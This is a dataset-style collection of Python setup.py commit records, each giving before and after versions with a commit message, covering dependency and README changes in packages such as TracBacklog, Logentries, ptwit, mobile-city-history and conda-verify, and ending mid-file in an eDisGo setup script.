'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
}
)
Add simplejson as a requirement for the plugin.from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
},
install_requires=[
'simplejson>=2.0',
]
)
| <commit_before>from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
}
)
<commit_msg>Add simplejson as a requirement for the plugin.<commit_after>from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
},
install_requires=[
'simplejson>=2.0',
]
)
|
0dd97c8154cb73d709656fbee99b8539d73a3ea6 | setup.py | setup.py | from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.rst').read(),
install_requires=[
"certifi",
],
)
| from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.md').read(),
install_requires=[
"certifi",
],
)
| Use md instead of rst | Use md instead of rst
| Python | mit | logentries/le_python,jcftang/le_python,drgarcia1986/le_python | from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.rst').read(),
install_requires=[
"certifi",
],
)
Use md instead of rst | from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.md').read(),
install_requires=[
"certifi",
],
)
| <commit_before>from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.rst').read(),
install_requires=[
"certifi",
],
)
<commit_msg>Use md instead of rst<commit_after> | from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.md').read(),
install_requires=[
"certifi",
],
)
| from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.rst').read(),
install_requires=[
"certifi",
],
)
Use md instead of rstfrom distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.md').read(),
install_requires=[
"certifi",
],
)
| <commit_before>from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.rst').read(),
install_requires=[
"certifi",
],
)
<commit_msg>Use md instead of rst<commit_after>from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.md').read(),
install_requires=[
"certifi",
],
)
|
8682d4fe70571e6ad06357cd7d1f30559ed177ce | setup.py | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter==3.1', 'click==6.6', 'click-default-group==1.2'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter', 'click-default-group', 'click'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
| Remove 3rd package required version | Remove 3rd package required version
| Python | mit | ptpt/ptwit | #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter==3.1', 'click==6.6', 'click-default-group==1.2'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
Remove 3rd package required version | #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter', 'click-default-group', 'click'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
| <commit_before>#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter==3.1', 'click==6.6', 'click-default-group==1.2'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
<commit_msg>Remove 3rd package required version<commit_after> | #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter', 'click-default-group', 'click'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter==3.1', 'click==6.6', 'click-default-group==1.2'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
Remove 3rd package required version#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter', 'click-default-group', 'click'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
| <commit_before>#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter==3.1', 'click==6.6', 'click-default-group==1.2'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
<commit_msg>Remove 3rd package required version<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter', 'click-default-group', 'click'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
|
e093b77da3f914d15ace4d916cbe0ae9543c1327 | setup.py | setup.py | import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
) | import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"django-mssql >= 1.5",
"pywin32 >= 219",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
) | Add mssql to staging branch | Add mssql to staging branch
| Python | mit | fraunhoferfokus/mobile-city-memory,jessepeng/coburg-city-memory,fraunhoferfokus/mobile-city-memory,jessepeng/coburg-city-memory | import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
)Add mssql to staging branch | import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"django-mssql >= 1.5",
"pywin32 >= 219",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
) | <commit_before>import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
)<commit_msg>Add mssql to staging branch<commit_after> | import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"django-mssql >= 1.5",
"pywin32 >= 219",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
) | import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
)Add mssql to staging branchimport ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"django-mssql >= 1.5",
"pywin32 >= 219",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
) | <commit_before>import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
)<commit_msg>Add mssql to staging branch<commit_after>import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"django-mssql >= 1.5",
"pywin32 >= 219",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
) |
5b7b410d49f82d90b5846edaa523cd8b0a703b07 | setup.py | setup.py | # (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7']
else:
requirements = ['click >= 6.7']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
| # (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7',
'jinja2 >= 2.9.6']
else:
requirements = ['click >= 6.7', 'jinja2 >= 2.9.6']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
| Add jinja2 as install requirement | Add jinja2 as install requirement
| Python | bsd-3-clause | mandeep/conda-verify | # (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7']
else:
requirements = ['click >= 6.7']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
Add jinja2 as install requirement | # (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7',
'jinja2 >= 2.9.6']
else:
requirements = ['click >= 6.7', 'jinja2 >= 2.9.6']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
| <commit_before># (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7']
else:
requirements = ['click >= 6.7']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
<commit_msg>Add jinja2 as install requirement<commit_after> | # (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7',
'jinja2 >= 2.9.6']
else:
requirements = ['click >= 6.7', 'jinja2 >= 2.9.6']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
| # (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7']
else:
requirements = ['click >= 6.7']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
Add jinja2 as install requirement# (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7',
'jinja2 >= 2.9.6']
else:
requirements = ['click >= 6.7', 'jinja2 >= 2.9.6']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
| <commit_before># (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7']
else:
requirements = ['click >= 6.7']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
<commit_msg>Add jinja2 as install requirement<commit_after># (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7',
'jinja2 >= 2.9.6']
else:
requirements = ['click >= 6.7', 'jinja2 >= 2.9.6']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
|
7143e2706dbf78a064b49369a4b17636ef0bf6dd | setup.py | setup.py | from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
